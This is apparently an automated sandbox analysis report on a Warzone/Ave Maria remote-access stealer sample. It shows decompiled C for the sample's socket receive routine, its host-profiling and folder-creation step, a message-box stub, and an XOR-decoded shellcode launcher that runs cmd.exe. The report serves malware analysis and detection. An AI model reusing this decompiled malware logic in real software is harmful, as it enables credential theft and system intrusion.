                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 08ba525f145b752384ec4a42338f895a0cc512e83347dc4fdfca3017925d1146
                                                                    • Instruction ID: f74a0ce81c29b786a64de25dc9735e668b2b2bb70e1fcb643dfecedf037582c2
                                                                    • Opcode Fuzzy Hash: 08ba525f145b752384ec4a42338f895a0cc512e83347dc4fdfca3017925d1146
                                                                    • Instruction Fuzzy Hash: 9D01F13A20A7116EE7222B766C858A76758DB5237C720023FF920721E3EE3E4C11614E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040956E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID: }@
                                                                    • API String ID: 1740715915-2912179412
                                                                    • Opcode ID: c1c9ab8c0afdd89c8a9d5626c4c84074ae2314385de9e56e62548992c5b542cf
                                                                    • Instruction ID: 357d1c2884cbd0d031beb62869e10f3ec091ef4f3fd5d6824de8185d1c940450
                                                                    • Opcode Fuzzy Hash: c1c9ab8c0afdd89c8a9d5626c4c84074ae2314385de9e56e62548992c5b542cf
                                                                    • Instruction Fuzzy Hash: 1251E272605202AFDB298F56D941BBB77A4EF50304F14493FE805672D2EB3AEC51CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1562F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151networkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E02D1562F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t47;
				char* _t54;
				intOrPtr _t79;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t114;
				char* _t115;
				char _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t114 = __edx;
				_t89 = __ecx;
				_t47 = E02D11190(0x10040, __ecx);
				_t88 = _t89;
				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
					_t117 = 0;
					E02D11052( &_v65600, 0, 0xffff);
					_t120 = _t119 + 0xc;
					_v60 = 0;
					_v56 = 0;
					E02D13003( &_v52, _t114, E02D133BF( &_v12, "warzone160"));
					E02D15EA5(_v12);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t54 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117);
						_t115 = _t54;
						if(_t115 != 0xc) {
							goto L8;
						}
						_v16 = _t117;
						_t106 =  &_v16;
						_v12 = _t117;
						E02D12F91( &_v16,  &_v65600, _t54);
						_t107 = _t120;
						E02D1304C(_t120,  &_v16);
						E02D1304C(_t120,  &_v52);
						E02D160AA( &_v44, _t114, _t120, _t107,  &_v16, _t106);
						_t120 = _t120 + 0x10;
						_t79 =  *((intOrPtr*)(_v44 + 4));
						_t118 = _t79 + 0xc;
						if(_t79 == 0 || _t118 == _t115) {
							L7:
							E02D13036( &_v44);
							E02D13036( &_v16);
							L9:
							_t96 =  &_v24;
							E02D12F91( &_v24,  &_v65600, _t115);
							_t97 = _t120;
							E02D1304C(_t120,  &_v24);
							E02D1304C(_t120,  &_v52);
							E02D160AA( &_v36, _t114, _t120, _t97,  &_v24, _t96);
							_t120 = _t120 + 0x10;
							E02D12FC3(_t88 + 0x10);
							E02D12F91(_t88 + 0x10, _v36, _t115);
							E02D12FC3( &_v24);
							E02D12FC3( &_v36);
							E02D14F65(_t88, _t114, _a4);
							E02D13036( &_v36);
							if(_t115 <= 0) {
								goto L12;
							}
							_t117 = 0;
							continue;
						} else {
							while(1) {
								_t85 =  &_v65600 + _t115;
								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
								if(_t85 == 0xffffffff) {
									break;
								}
								_t115 = _t115 + _t85;
								if(_t118 != _t115) {
									continue;
								}
								goto L7;
							}
							E02D13036( &_v44);
							E02D13036( &_v16);
							L12:
							E02D13036( &_v24);
							E02D13036( &_v52);
							return E02D13036( &_v60);
						}
						L8:
						if(_t115 == 0xffffffff) {
							goto L12;
						}
						goto L9;
					}
				}
				return _t47;
			}


























                                                                    0x02d1562f
                                                                    0x02d1562f
                                                                    0x02d15637
                                                                    0x02d1563d
                                                                    0x02d15645
                                                                    0x02d15650
                                                                    0x02d15666
                                                                    0x02d1566d
                                                                    0x02d15677
                                                                    0x02d1567c
                                                                    0x02d1567f
                                                                    0x02d15685
                                                                    0x02d15696
                                                                    0x02d1569e
                                                                    0x02d156a3
                                                                    0x02d156a6
                                                                    0x02d156a9
                                                                    0x02d156ac
                                                                    0x02d156b6
                                                                    0x02d156bc
                                                                    0x02d156c1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d156ce
                                                                    0x02d156d2
                                                                    0x02d156d5
                                                                    0x02d156d8
                                                                    0x02d156e2
                                                                    0x02d156e5
                                                                    0x02d156f2
                                                                    0x02d156fa
                                                                    0x02d15702
                                                                    0x02d15705
                                                                    0x02d15708
                                                                    0x02d1570d
                                                                    0x02d1573b
                                                                    0x02d1573e
                                                                    0x02d15746
                                                                    0x02d15756
                                                                    0x02d1575e
                                                                    0x02d15761
                                                                    0x02d1576b
                                                                    0x02d1576e
                                                                    0x02d1577b
                                                                    0x02d15783
                                                                    0x02d15788
                                                                    0x02d1578e
                                                                    0x02d1579a
                                                                    0x02d157a2
                                                                    0x02d157aa
                                                                    0x02d157b4
                                                                    0x02d157bc
                                                                    0x02d157c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d157c5
                                                                    0x00000000
                                                                    0x02d15713
                                                                    0x02d15713
                                                                    0x02d15720
                                                                    0x02d15726
                                                                    0x02d1572f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15735
                                                                    0x02d15739
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15739
                                                                    0x02d157cf
                                                                    0x02d157d7
                                                                    0x02d157dc
                                                                    0x02d157df
                                                                    0x02d157e7
                                                                    0x00000000
                                                                    0x02d157ef
                                                                    0x02d1574d
                                                                    0x02d15750
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15750
                                                                    0x02d156a9
                                                                    0x02d157f8

                                                                    APIs
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 02D15666
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 02D156B6
                                                                    • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 02D15726
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                                    • String ID: `$warzone160
                                                                    • API String ID: 3973575906-811885577
                                                                    • Opcode ID: 8b4413affa737bf4b5587ae44aef04dc47764c5b002ed839554d0cf4f5e84a23
                                                                    • Instruction ID: d53204d6ece4fca7f1ee9e4d4122864a5dc8537bcb03a9743179bd79e6a72020
                                                                    • Opcode Fuzzy Hash: 8b4413affa737bf4b5587ae44aef04dc47764c5b002ed839554d0cf4f5e84a23
                                                                    • Instruction Fuzzy Hash: C3516E71D00118BACF25EF61FC85DEEBB7AEF54360F500169E815A6690EB349E48CEB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C58F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @4o$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                    • API String ID: 0-3440025040
                                                                    • Opcode ID: 7b096d1ae813de5a11d7bd3bc01f5e9eab5b3330bf7c90b6959ea4c9cbf75557
                                                                    • Instruction ID: 956e86031d763e11a7c7375fec47e8157eb24153588bfd8a9b74ca5733fe2300
                                                                    • Opcode Fuzzy Hash: 7b096d1ae813de5a11d7bd3bc01f5e9eab5b3330bf7c90b6959ea4c9cbf75557
                                                                    • Instruction Fuzzy Hash: 94419375A00218EFCB21DF9A9CC09AEBBF8EB89314F10057BF404B7291D6795A41DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D12CEC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E02D12CEC(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E02D1F80E(E02D1F93F( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E02D21E21( &_v344,  &_v16);
				_v12 = 0;
				E02D21BF8(_t28, _v16, 0x10ad,  &_v12);
				_t82 = _t81 + 4;
				E02D135E5(_t82, _v20);
				E02D135E5(_t82, _v24);
				_t32 = E02D1FA1F();
				E02D135E5(_t82, 0x2d24648);
				_t64 = _t82;
				E02D1FC7E(_t82);
				_t35 = E02D1FC58(_t82);
				_t36 = E02D1FBFC();
				_t37 = E02D1FA42();
				E02D1FCB8(_t82, _v16);
				E02D14F2B(_t54, E02D14241( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E02D141FF( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E02D11052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E02D1990A(_t54, 1);
					_v12 = 0x2d27524;
					E02D14F2B(_t54,  &_v12);
				}
				E02D15EA5(_v20);
				return E02D15EA5(_v24);
			}






















                                                                    0x02d12cec
                                                                    0x02d12cf7
                                                                    0x02d12cfd
                                                                    0x02d12d07
                                                                    0x02d12d1b
                                                                    0x02d12d24
                                                                    0x02d12d2d
                                                                    0x02d12d40
                                                                    0x02d12d43
                                                                    0x02d12d4b
                                                                    0x02d12d53
                                                                    0x02d12d5c
                                                                    0x02d12d61
                                                                    0x02d12d72
                                                                    0x02d12d78
                                                                    0x02d12d7a
                                                                    0x02d12d7f
                                                                    0x02d12d85
                                                                    0x02d12d8b
                                                                    0x02d12d9a
                                                                    0x02d12daa
                                                                    0x02d12db2
                                                                    0x02d12dbc
                                                                    0x02d12dcb
                                                                    0x02d12ddf
                                                                    0x02d12df1
                                                                    0x02d12dff
                                                                    0x02d12e08
                                                                    0x02d12e10
                                                                    0x02d12e1a
                                                                    0x02d12e1a
                                                                    0x02d12e22
                                                                    0x02d12e33

                                                                    APIs
                                                                      • Part of subcall function 02D1F80E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02D1F825
                                                                      • Part of subcall function 02D1F80E: CoInitialize.OLE32(00000000), ref: 02D1F82C
                                                                      • Part of subcall function 02D1F80E: CoCreateInstance.OLE32(02D24490,00000000,00000017,02D26E60,?,?,?,?,?,?,?,?,?,02D12D0C), ref: 02D1F84A
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D12D1B
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1FA1F: GlobalMemoryStatusEx.KERNEL32(?), ref: 02D1FA30
                                                                      • Part of subcall function 02D1FC7E: GetComputerNameW.KERNEL32 ref: 02D1FCA1
                                                                      • Part of subcall function 02D1FC58: GetCurrentProcess.KERNEL32(?,?,02D12D84,?,02D24648,?,?,00000000,?,?,?), ref: 02D1FC5C
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                      • Part of subcall function 02D1FA42: LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1FA5A
                                                                      • Part of subcall function 02D1FA42: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1FA6A
                                                                      • Part of subcall function 02D1FCB8: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 02D1FCFC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 02D12DDF
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D12DF1
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 02D12DFF
                                                                      • Part of subcall function 02D1990A: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19916
                                                                      • Part of subcall function 02D1990A: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D1992D
                                                                      • Part of subcall function 02D1990A: EnterCriticalSection.KERNEL32(02E5DB10,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19939
                                                                      • Part of subcall function 02D1990A: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19949
                                                                      • Part of subcall function 02D1990A: LeaveCriticalSection.KERNEL32(02E5DB10,?,00000000), ref: 02D1999C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                                                    • String ID: \Microsoft Vision\
                                                                    • API String ID: 3023051892-1618823865
                                                                    • Opcode ID: 15cfd73bc9b6773c04911288bfd4146eb6c72944ff06ba75a6a220c289a68f12
                                                                    • Instruction ID: 1139c8780acbe8946ad5eead13a9ca46169020b9cd5106431e79615491cfc17c
                                                                    • Opcode Fuzzy Hash: 15cfd73bc9b6773c04911288bfd4146eb6c72944ff06ba75a6a220c289a68f12
                                                                    • Instruction Fuzzy Hash: 90313EB1A00218BBDB14FBA0EC95DEEB77EEF54305F404465A505A2B80DA749E498FB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A502 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040A5C5,?,?,0054C400,00000000,?,0040A6F0,00000004,InitializeCriticalSectionEx,004196A8,InitializeCriticalSectionEx,00000000), ref: 0040A593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 34359c6363ad398c414f554c79b7176573ff717a0a3e1fd5e1a7425f226337bf
                                                                    • Instruction ID: 14e935a7b1eb0b49c324d93eda5382a4077dfcbf6f988bcf5186de8be7a15611
                                                                    • Opcode Fuzzy Hash: 34359c6363ad398c414f554c79b7176573ff717a0a3e1fd5e1a7425f226337bf
                                                                    • Instruction Fuzzy Hash: B811C432E41724BBCB224B689C40B9A37A4BB05760F254172E901BB2D0D778ED1086DF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20B2A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E02D20B2A(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E02D2094E();
				_push(__ecx);
				_t16 = E02D20969(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E02D20B2A,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E02D207C4(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E02D20BD9( &_v16, _t47, E02D135E5( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E02D15EA5(_v8);
						_v8 = 0;
						E02D15EA5(0);
						_push(0);
						_v12 = 0;
						E02D20BD9( &_v16, _t47, E02D135E5( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E02D15EA5(_v8);
						_v8 = 0;
						return E02D15EA5(0);
					}
				}
				return _t16;
			}












                                                                    0x02d20b2a
                                                                    0x02d20b31
                                                                    0x02d20b36
                                                                    0x02d20b3e
                                                                    0x02d20b46
                                                                    0x02d20b57
                                                                    0x02d20b59
                                                                    0x02d20b5c
                                                                    0x02d20b5e
                                                                    0x02d20b60
                                                                    0x02d20b70
                                                                    0x02d20b76
                                                                    0x02d20b7a
                                                                    0x02d20b8f
                                                                    0x02d20b97
                                                                    0x02d20b9e
                                                                    0x02d20ba1
                                                                    0x02d20ba6
                                                                    0x02d20baa
                                                                    0x02d20bbf
                                                                    0x02d20bc7
                                                                    0x02d20bce
                                                                    0x00000000
                                                                    0x02d20bd1
                                                                    0x02d20b5e
                                                                    0x02d20bd8

                                                                    APIs
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    • MessageBoxA.USER32 ref: 02D20B70
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D20BD9: CreateProcessW.KERNEL32 ref: 02D20C14
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 02D20BAE
                                                                    • Bla2, xrefs: 02D20B67, 02D20B6D, 02D20B6E
                                                                    • VirtualQuery, xrefs: 02D20B37
                                                                    • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 02D20B7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                                                    • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                                    • API String ID: 1196126833-2308542105
                                                                    • Opcode ID: 034903eec32873d01467a910f0d2c70a654d0f22fb6d257b05b09f1e4c31725e
                                                                    • Instruction ID: 91af630c493fd8367a9c2497205c211db967b2582fac653e3c0b657c1b470114
                                                                    • Opcode Fuzzy Hash: 034903eec32873d01467a910f0d2c70a654d0f22fb6d257b05b09f1e4c31725e
                                                                    • Instruction Fuzzy Hash: C2111F71900128FAEB18EBA0ED55CEFB77DDE64718F10405AA402B2780EB359F08CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21936 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E02D21936(void* __ecx) {
				long _v8;
				void* _t7;
				void* _t17;
				void* _t24;
				void* _t26;
				WCHAR* _t31;

				_push(__ecx);
				_t17 = __ecx;
				_t26 = E02D11085(0x800);
				_t24 = _t26;
				_t7 = 0x601;
				do {
					 *_t24 =  *(0x2d26070 + _t24) ^ 0x00000045;
					_t24 = _t24 + 1;
					_t7 = _t7 - 1;
				} while (_t7 != 0);
				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_t31, 0x104);
				E02D1102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
				_t5 = _t26 + 0xef; // 0xef
				return  *_t5(_t31, _t17, 0, 0);
			}









                                                                    0x02d21939
                                                                    0x02d21942
                                                                    0x02d21949
                                                                    0x02d21951
                                                                    0x02d21955
                                                                    0x02d2195a
                                                                    0x02d21960
                                                                    0x02d21962
                                                                    0x02d21963
                                                                    0x02d21963
                                                                    0x02d21974
                                                                    0x02d2198e
                                                                    0x02d21996
                                                                    0x02d219ae
                                                                    0x02d219b6
                                                                    0x02d219c8

                                                                    APIs
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000), ref: 02D21974
